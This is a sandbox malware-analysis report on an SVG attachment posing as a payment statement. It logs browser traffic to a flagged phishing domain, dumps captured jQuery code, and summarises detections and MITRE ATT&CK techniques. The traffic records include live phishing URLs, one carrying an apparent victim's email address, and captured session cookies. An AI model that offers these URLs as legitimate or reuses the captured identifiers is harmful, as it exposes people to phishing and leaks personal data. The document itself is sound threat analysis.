if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-25 14:51:08 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-25 14:51:08 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-25 14:51:08 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-25 14:51:08 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49728	104.21.65.232	443	7524	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 14:51:08 UTC	1325	OUT	GET /favicon.ico HTTP/1.1 Host: zak9.rnltvipi.es Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://zak9.rnltvipi.es/ebY7FU/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6IkVaZ292bWpQOG9uUEJsWVpScytMSGc9PSIsInZhbHVlIjoiSmM4OHI3UWJ1MkVhdUJiRU9LdmJXMS9yemk0RkF2U0FUdWJERkZtU09lQlMzcHFlM2F5bW5TL001NWszNzBWMURmNXNod1pyUmpVQWxPYlpKOFBOd2dtQ2M0S2plcDBmcklDL1puVGRSMkpDNVlURCtVandlRzBQVHZpLzJGSjUiLCJtYWMiOiI5OThiZTU1NjczNGY5Y2NkMWEzNzE1ZTU3OTAwMDdmZTQxYjYyZDZhNzljYWYxMmU5ZmU1ODg0M2Y2NGVhN2YyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjI4ODFOYjNWempxdGgrM3o1cko3T3c9PSIsInZhbHVlIjoiM1NvYlc2dTh2bkdqbU5QZjNDVHBpTnZKdGdlcXVZSHRmbG53TmFnUDhNbTNjSm1wYW9kQ29RYnJ4TnNIS3JiaGxtNVhmMEtiTHB3UllUOWZxYVJzUnh1aE9WdGIwbnpJa2dPWnN0eTlLRkNtSEkwM3gwM3lITG1meGtqbWEydUMiLCJtYWMiOiI4OGRkZjJjODNiNDhkZTdmZDE1OWZkM2ViMzQ5ZTE2MWQ0ZTEzZmI1M2U2YWFkYTM5YzIxM2JiMzI2NGYxMDI3IiwidGFnIjoiIn0%3D
2025-03-25 14:51:08 UTC	1057	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Mar 2025 14:51:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding server-timing: cfL4;desc="?proto=TCP&rtt=10444&min_rtt=10261&rtt_var=3979&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2231&delivery_rate=277555&cwnd=171&unsent_bytes=0&cid=244a0342336423a7&ts=425&x=0" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Server: cloudflare CF-RAY: 925f39810b248cb3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=105175&min_rtt=104738&rtt_var=22751&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1897&delivery_rate=35127&cwnd=226&unsent_bytes=0&cid=22bc72eb5224ea5b&ts=3592&x=0"
2025-03-25 14:51:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	35.190.80.1	443	7524	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 14:51:09 UTC	531	OUT	OPTIONS /report/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://zak9.rnltvipi.es Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 14:51:09 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Tue, 25 Mar 2025 14:51:09 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	35.190.80.1	443	7524	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 14:51:09 UTC	506	OUT	POST /report/v4?s=O2WcJ1QI9TH74wznXh55UETT1R4913Oe6pf9d4KuBzroR5PM%2FNprmngMGuTE9HfQO5KKDRlQFf3PEb6043TvoC7dPZ7MdwgCNMKSknxq7NqaD0dFvz5B37pP5yH%2B HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 429 Content-Type: application/reports+json Origin: https://zak9.rnltvipi.es User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 14:51:09 UTC	429	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 7a 61 6b 39 2e 72 6e 6c 74 76 69 70 69 2e 65 73 2f 65 62 59 37 46 55 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 35 2e 32 33 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 Data Ascii: [{"age":0,"body":{"elapsed_time":730,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://zak9.rnltvipi.es/ebY7FU/","sampling_fraction":1.0,"server_ip":"104.21.65.232","status_code":404,"type":"http.error"},"type":"network-error"
2025-03-25 14:51:10 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Tue, 25 Mar 2025 14:51:09 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	4
Start time:	10:50:57
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:50:57
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2144,i,17587488231862270499,9783340658686126659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2172 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:51:03
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\34209QB_EFT_Payment_Statemt25.svg"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: https://zak9.rnltvipi.es/favicon.ico	Avira URL Cloud: Label: malware
Source: https://zak9.rnltvipi.es/ebY7FU/	Avira URL Cloud: Label: malware

Source: 1.4..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://zak9.rnltvipi.es/ebY7FU/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent. The overall behavior of this script is highly suspicious and poses a significant security risk.
Source: 1.6..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://zak9.rnltvipi.es/ebY7FU/... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The obfuscated string is decoded and then evaluated, which can lead to the execution of malicious code. Additionally, the script uses a `Proxy` object to intercept property access, further increasing the risk of unauthorized code execution. Overall, this script exhibits a high level of risk and should be thoroughly reviewed before execution.

Source: https://zak9.rnltvipi.es/ebY7FU/#Rccate@securustechnologies.com	HTTP Parser: No favicon
Source: https://zak9.rnltvipi.es/ebY7FU/#Rccate@securustechnologies.com	HTTP Parser: No favicon

Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: Yara match	File source: 1.2.d.script.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ebY7FU/ HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://zak9.rnltvipi.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: zak9.rnltvipi.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zak9.rnltvipi.es/ebY7FU/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkVaZ292bWpQOG9uUEJsWVpScytMSGc9PSIsInZhbHVlIjoiSmM4OHI3UWJ1MkVhdUJiRU9LdmJXMS9yemk0RkF2U0FUdWJERkZtU09lQlMzcHFlM2F5bW5TL001NWszNzBWMURmNXNod1pyUmpVQWxPYlpKOFBOd2dtQ2M0S2plcDBmcklDL1puVGRSMkpDNVlURCtVandlRzBQVHZpLzJGSjUiLCJtYWMiOiI5OThiZTU1NjczNGY5Y2NkMWEzNzE1ZTU3OTAwMDdmZTQxYjYyZDZhNzljYWYxMmU5ZmU1ODg0M2Y2NGVhN2YyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjI4ODFOYjNWempxdGgrM3o1cko3T3c9PSIsInZhbHVlIjoiM1NvYlc2dTh2bkdqbU5QZjNDVHBpTnZKdGdlcXVZSHRmbG53TmFnUDhNbTNjSm1wYW9kQ29RYnJ4TnNIS3JiaGxtNVhmMEtiTHB3UllUOWZxYVJzUnh1aE9WdGIwbnpJa2dPWnN0eTlLRkNtSEkwM3gwM3lITG1meGtqbWEydUMiLCJtYWMiOiI4OGRkZjJjODNiNDhkZTdmZDE1OWZkM2ViMzQ5ZTE2MWQ0ZTEzZmI1M2U2YWFkYTM5YzIxM2JiMzI2NGYxMDI3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: zak9.rnltvipi.es
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 34209QB_EFT_Payment_Statemt25.svg

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

